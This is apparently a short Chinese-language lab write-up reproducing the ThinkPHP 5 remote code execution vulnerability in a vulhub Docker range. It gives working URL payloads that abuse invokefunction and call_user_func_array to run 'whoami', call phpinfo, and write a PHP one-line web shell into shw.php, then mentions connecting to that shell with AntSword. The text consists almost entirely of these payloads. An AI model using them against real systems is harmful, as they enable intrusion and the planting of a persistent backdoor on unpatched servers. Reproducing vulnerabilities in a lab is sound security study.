环境配置
云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
漏洞复现
1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏
POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1
\[\]=whoami

3.远程代码执行
POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0=phpinfo&vars
1\[\]=-1

4.写入一句话木马到根目录下的shw.php
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars0=system&vars1\[\]=echo "<?php @eval(\$_POSTcmd);?>" > shw.php
5.蚁剑连接
